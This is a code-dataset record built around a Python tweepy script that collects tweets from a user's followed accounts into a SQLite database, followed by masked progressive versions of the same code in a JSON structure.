= bgnormavg.drop(columns=['Unnamed: 0'])\nmain = bg1.sample(frac=1)\nmain = main.reset_index()\nmain = main.iloc[:, 1:]\n\ntrain = main.iloc[:650]\nval = main.iloc[650:]\n\n# main2 = main.sample(frac=1)\n\nX_train = main.iloc[:, 1:]\ny_train = main['label']\nX_val = val.iloc[:, 1:]\ny_val = val['label']\n\nmodel, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val, y_val, 'tree')\n\nprint(indices)",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
#!/home/nick/.virtualenvs/twitterbots/bin/python3.5
# -*- coding: utf-8 -*-
import tweepy
import sqlite3
from configparser import ConfigParser
'''
A little OOP would be good later for
authenticated user data, c, conn, api
'''
def main():
Collector.collect()
class Collector:
# Main function
def collect():
api = Collector.get_api()
tweet_dump = Collector.all_tweet_db()
c = tweet_dump[0]
conn = tweet_dump[1]
last_list = Collector.last_tweets(c, conn)
# Look for new friends, add to db
new_friends = Collector.new_f_check(api, c)
Collector.download_to_limit(api, c, conn, new_friends)
# Checks timelines of everyone in db already
# adds anything new to db
Collector.download_recent(api, c, conn, last_list)
def get_api():
parser = ConfigParser()
parser.read('twitter_auth.ini')
consumer_key = parser.get('Keys',
'consumer_key').strip("'")
consumer_secret = parser.get('Secrets',
'consumer_secret').strip("'")
access_token = parser.get('Tokens',
'access_token').strip("'")
access_token_secret = parser.get('Secrets',
'access_token_secret').strip("'")
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
return api
# connects to tweet_dump.db creates tdump if not exists
# tdump stores all tweets from anyone in list
def all_tweet_db():
conn = sqlite3.connect('tweet_dump_main.db')
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS tdump
(tweet TEXT,
username TEXT,
tweet_date TEXT,
tweet_id TEXT,
tweet_source TEXT,
user_id TEXT)''')
return c, conn
# connects to tweet_dump.db creats served if not exists
# served stores tweets that are mention authenticated user
def mention_tweet_db():
conn = sqlite3.connect('tweet_dump_main.db')
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS mentioned
(tweet TEXT,
username TEXT,
tweet_date TEXT,
tweet_id TEXT,
tweet_source TEXT,
user_id TEXT)''')
return c, conn
# looks for new friends by comparing authenticated
# user's friend list with list of friends in tdump
def new_f_check(api, c):
# get list of user's ids
c.execute('SELECT user_id FROM tdump')
users = c.fetchall()
users = list(set([user[0] for user in users]))
# get list of friends_ids from twitter
friends_ids = api.friends_ids()
new_friends = [x for x in friends_ids if str(x) not in users]
return new_friends
# downloads up to 3200 of a user's most
# recent tweets commits to tdump
def download_to_limit(api, c, conn, friend_list):
# List of tweet ids already in db
c.execute('SELECT tweet_id FROM tdump')
tweet_ids = c.fetchall()
tweet_ids = [e[0] for e in tweet_ids]
new_tweets = []
for friend in friend_list:
try:
# try to get most recent 200 tweets from friend
get_tweets = api.user_timeline(id=friend, count=200)
except Exception as e:
continue
# add to list of all of this friend's tweets
new_tweets.extend(get_tweets)
# find oldest retrieved tweet's id number less 1
oldest = new_tweets[-1].id - 1
# get tweets until 3200 limit hit
while len(get_tweets) > 0:
try:
# max_id arg looks for id's less than arg's value
get_tweets = api.user_timeline(id=friend,
count=200,
max_id=oldest)
except Exception as e:
continue
new_tweets.extend(get_tweets)
oldest = new_tweets[-1].id - 1
if len(new_tweets) != 0:
print('Insert Active')
for tweet in new_tweets:
c.execute('''INSERT INTO tdump
(tweet,
username,
tweet_date,
tweet_id,
tweet_source,
user_id)
VALUES(?,?,?,?,?,?)''',
[tweet.text,
tweet.user.screen_name,
tweet.created_at,
tweet.id_str,
tweet.source,
tweet.user.id_str])
conn.commit()
if len(new_tweets) != 0:
print('Insert Done' + '\n')
# simply check if tweet text contains my screen name
# change from hard code later
def mention_me(new_tweet_list, c, conn):
mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]
if len(new_tweet_list) != 0:
print('Insert Active')
for tweet in mentioned:
c.execute('''INSERT INTO served
(tweet,
username,
tweet_date,
tweet_id,
tweet_source,
user_id)
VALUES(?,?,?,?,?,?)''',
[tweet.text,
tweet.user.screen_name,
tweet.created_at,
tweet.id_str,
tweet.source,
tweet.user.id_str])
conn.commit()
if len(new_tweet_list) != 0:
print('Insert Done' + '\n')
# returns list of user_id and created_at pairs
# date associated with user_id is date of last
# tweet in database
def last_tweets(c, conn):
# list of user ids and the date of the
# last tweet in db
user_last_tweets = []
# get list of user's ids
c.execute('SELECT user_id FROM tdump')
users = c.fetchall()
users = list(set([user[0] for user in users]))
for user in users:
c.execute('''SELECT user_id, tweet_id
FROM tdump
WHERE user_id = ?
ORDER BY tweet_date DESC''',
[user])
last_tweet = c.fetchone()
user_last_tweets.append(last_tweet)
return user_last_tweets
# downloads most recent posts in each users timelines
def download_recent(api, c, conn, last_tweets):
c.execute('SELECT tweet_id FROM tdump')
tweet_ids = [x[0] for x in c.fetchall()]
new_tweets = []
for pair in last_tweets:
user_id = pair[0]
tweet_id = pair[1]
try:
get_tweets = api.user_timeline(id=user_id,
since_id=tweet_id,
count=200)
except Exception:
continue
if len(get_tweets) != 0:
# add to list of all of this friend's tweets
new_tweets.extend(get_tweets)
# find newest retrieved tweet's id number plus 1
newest = get_tweets[0].id + 1
while len(get_tweets) > 0:
try:
# max_id arg looks for id's less than arg's value
get_tweets = api.user_timeline(id=user_id,
count=200,
since_id=newest)
new_tweets.extend(get_tweets)
newest = get_tweets[0].id + 1
except Exception:
continue
if len(new_tweets) != 0:
print('Insert Active')
for tweet in new_tweets:
if tweet.user.screen_name != 'BonneNick' \
and tweet.id not in tweet_ids:
c.execute('''INSERT INTO tdump
(tweet,
username,
tweet_date,
tweet_id,
tweet_source,
user_id)
VALUES(?,?,?,?,?,?)''',
[tweet.text,
tweet.user.screen_name,
tweet.created_at,
tweet.id_str,
tweet.source,
tweet.user.id_str])
conn.commit()
conn.close()
if len(new_tweets) != 0:
print('Insert Done' + '\n')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "372d8c8cb9ec8f579db8588aff7799c73c5af255",
"index": 519,
"step-1": "<mask token>\n\n\nclass Collector:\n <mask token>\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n <mask token>\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n <mask token>\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n <mask token>\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Collector:\n <mask token>\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n\n def all_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def new_f_check(api, c):\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n friends_ids = api.friends_ids()\n new_friends = [x for x in friends_ids if str(x) not in users]\n return new_friends\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n def mention_me(new_tweet_list, c, conn):\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n if len(new_tweet_list) != 0:\n print('Insert Active')\n for tweet in mentioned:\n c.execute(\n \"\"\"INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweet_list) != 0:\n print('Insert Done' + '\\n')\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n\n def download_recent(api, c, conn, last_tweets):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n new_tweets = []\n for pair in last_tweets:\n user_id = pair[0]\n tweet_id = pair[1]\n try:\n get_tweets = api.user_timeline(id=user_id, since_id=\n tweet_id, count=200)\n except Exception:\n continue\n if len(get_tweets) != 0:\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=user_id, count=\n 200, since_id=newest)\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n except Exception:\n continue\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n if (tweet.user.screen_name != 'BonneNick' and tweet.id not in\n tweet_ids):\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n conn.close()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n Collector.collect()\n\n\nclass Collector:\n\n def collect():\n api = Collector.get_api()\n tweet_dump = Collector.all_tweet_db()\n c = tweet_dump[0]\n conn = tweet_dump[1]\n last_list = Collector.last_tweets(c, conn)\n new_friends = Collector.new_f_check(api, c)\n Collector.download_to_limit(api, c, conn, new_friends)\n Collector.download_recent(api, c, conn, last_list)\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n\n def all_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def new_f_check(api, c):\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n friends_ids = api.friends_ids()\n new_friends = [x for x in friends_ids if str(x) not in users]\n return new_friends\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n def mention_me(new_tweet_list, c, conn):\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n if len(new_tweet_list) != 0:\n print('Insert Active')\n for tweet in mentioned:\n c.execute(\n \"\"\"INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweet_list) != 0:\n print('Insert Done' + '\\n')\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n\n def download_recent(api, c, conn, last_tweets):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n new_tweets = []\n for pair in last_tweets:\n user_id = pair[0]\n tweet_id = pair[1]\n try:\n get_tweets = api.user_timeline(id=user_id, since_id=\n tweet_id, count=200)\n except Exception:\n continue\n if len(get_tweets) != 0:\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=user_id, count=\n 200, since_id=newest)\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n except Exception:\n continue\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n if (tweet.user.screen_name != 'BonneNick' and tweet.id not in\n tweet_ids):\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n conn.close()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef main():\n Collector.collect()\n\n\nclass Collector:\n\n def collect():\n api = Collector.get_api()\n tweet_dump = Collector.all_tweet_db()\n c = tweet_dump[0]\n conn = tweet_dump[1]\n last_list = Collector.last_tweets(c, conn)\n new_friends = Collector.new_f_check(api, c)\n Collector.download_to_limit(api, c, conn, new_friends)\n Collector.download_recent(api, c, conn, last_list)\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n\n def all_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def new_f_check(api, c):\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n friends_ids = api.friends_ids()\n new_friends = [x for x in friends_ids if str(x) not in users]\n return new_friends\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n def mention_me(new_tweet_list, c, conn):\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n if len(new_tweet_list) != 0:\n print('Insert Active')\n for tweet in mentioned:\n c.execute(\n \"\"\"INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweet_list) != 0:\n print('Insert Done' + '\\n')\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n\n def download_recent(api, c, conn, last_tweets):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n new_tweets = []\n for pair in last_tweets:\n user_id = pair[0]\n tweet_id = pair[1]\n try:\n get_tweets = api.user_timeline(id=user_id, since_id=\n tweet_id, count=200)\n except Exception:\n continue\n if len(get_tweets) != 0:\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=user_id, count=\n 200, since_id=newest)\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n except Exception:\n continue\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n if (tweet.user.screen_name != 'BonneNick' and tweet.id not in\n tweet_ids):\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n conn.close()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/home/nick/.virtualenvs/twitterbots/bin/python3.5\n# -*- coding: utf-8 -*-\n\nimport tweepy\nimport sqlite3\n\nfrom configparser import ConfigParser\n\n'''\nA little OOP would be good later for\nauthenticated user data, c, conn, api\n'''\n\n\ndef main():\n\n Collector.collect()\n\n\nclass Collector:\n\n # Main function\n def collect():\n\n api = Collector.get_api()\n\n tweet_dump = Collector.all_tweet_db()\n c = tweet_dump[0]\n conn = tweet_dump[1]\n last_list = Collector.last_tweets(c, conn)\n\n # Look for new friends, add to db\n new_friends = Collector.new_f_check(api, c)\n\n Collector.download_to_limit(api, c, conn, new_friends)\n\n # Checks timelines of everyone in db already\n # adds anything new to db\n Collector.download_recent(api, c, conn, last_list)\n\n def get_api():\n\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys',\n 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets',\n 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens',\n 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets',\n 'access_token_secret').strip(\"'\")\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n return api\n\n # connects to tweet_dump.db creates tdump if not exists\n # tdump stores all tweets from anyone in list\n def all_tweet_db():\n\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)''')\n\n return c, conn\n\n # connects to tweet_dump.db creats served if not exists\n # served stores tweets that are mention authenticated user\n def mention_tweet_db():\n\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)''')\n\n return c, conn\n\n # looks for new friends by comparing authenticated\n # user's friend list with list of friends in tdump\n def new_f_check(api, c):\n\n # get list of user's ids\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n\n # get list of friends_ids from twitter\n friends_ids = api.friends_ids()\n\n new_friends = [x for x in friends_ids if str(x) not in users]\n\n return new_friends\n\n # downloads up to 3200 of a user's most\n # recent tweets commits to tdump\n def download_to_limit(api, c, conn, friend_list):\n\n # List of tweet ids already in db\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n\n new_tweets = []\n\n for friend in friend_list:\n\n try:\n # try to get most recent 200 tweets from friend\n get_tweets = api.user_timeline(id=friend, count=200)\n\n except Exception as e:\n\n continue\n\n # add to list of all of this friend's tweets\n new_tweets.extend(get_tweets)\n\n # find oldest retrieved tweet's id number less 1\n oldest = new_tweets[-1].id - 1\n\n # get tweets until 3200 limit hit\n while len(get_tweets) > 0:\n\n try:\n # max_id arg looks for id's less than arg's value\n get_tweets = api.user_timeline(id=friend,\n count=200,\n max_id=oldest)\n\n except Exception as e:\n\n continue\n\n new_tweets.extend(get_tweets)\n\n oldest = new_tweets[-1].id - 1\n\n if len(new_tweets) != 0:\n\n print('Insert Active')\n\n for tweet in new_tweets:\n\n c.execute('''INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)''',\n [tweet.text,\n tweet.user.screen_name,\n tweet.created_at,\n tweet.id_str,\n tweet.source,\n tweet.user.id_str])\n\n conn.commit()\n\n if len(new_tweets) != 0:\n\n print('Insert Done' + '\\n')\n\n # simply check if tweet text contains my screen name\n # change from hard code later\n def mention_me(new_tweet_list, c, conn):\n\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n\n if len(new_tweet_list) != 0:\n\n print('Insert Active')\n\n for tweet in mentioned:\n\n c.execute('''INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)''',\n [tweet.text,\n tweet.user.screen_name,\n tweet.created_at,\n tweet.id_str,\n tweet.source,\n tweet.user.id_str])\n\n conn.commit()\n\n if len(new_tweet_list) != 0:\n\n print('Insert Done' + '\\n')\n\n # returns list of user_id and created_at pairs\n # date associated with user_id is date of last\n # tweet in database\n def last_tweets(c, conn):\n\n # list of user ids and the date of the\n # last tweet in db\n user_last_tweets = []\n\n # get list of user's ids\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n\n for user in users:\n\n c.execute('''SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC''',\n [user])\n\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n\n return user_last_tweets\n\n # downloads most recent posts in each users timelines\n def download_recent(api, c, conn, last_tweets):\n\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n\n new_tweets = []\n\n for pair in last_tweets:\n\n user_id = pair[0]\n tweet_id = pair[1]\n\n try:\n\n get_tweets = api.user_timeline(id=user_id,\n since_id=tweet_id,\n count=200)\n\n except Exception:\n\n continue\n\n if len(get_tweets) != 0:\n\n # add to list of all of this friend's tweets\n new_tweets.extend(get_tweets)\n\n # find newest retrieved tweet's id number plus 1\n newest = get_tweets[0].id + 1\n\n while len(get_tweets) > 0:\n\n try:\n # max_id arg looks for id's less than arg's value\n get_tweets = api.user_timeline(id=user_id,\n count=200,\n since_id=newest)\n\n new_tweets.extend(get_tweets)\n\n newest = get_tweets[0].id + 1\n\n except Exception:\n\n continue\n\n if len(new_tweets) != 0:\n\n print('Insert Active')\n\n for tweet in new_tweets:\n\n if tweet.user.screen_name != 'BonneNick' \\\n and tweet.id not in tweet_ids:\n\n c.execute('''INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)''',\n [tweet.text,\n tweet.user.screen_name,\n tweet.created_at,\n tweet.id_str,\n tweet.source,\n tweet.user.id_str])\n\n conn.commit()\n conn.close()\n\n if len(new_tweets) != 0:\n\n print('Insert Done' + '\\n')\n\n\nif __name__ == '__main__':\n\n main()\n",
"step-ids": [
5,
9,
11,
12,
14
]
}
|
[
5,
9,
11,
12,
14
] |
import numpy as np
import math
import os
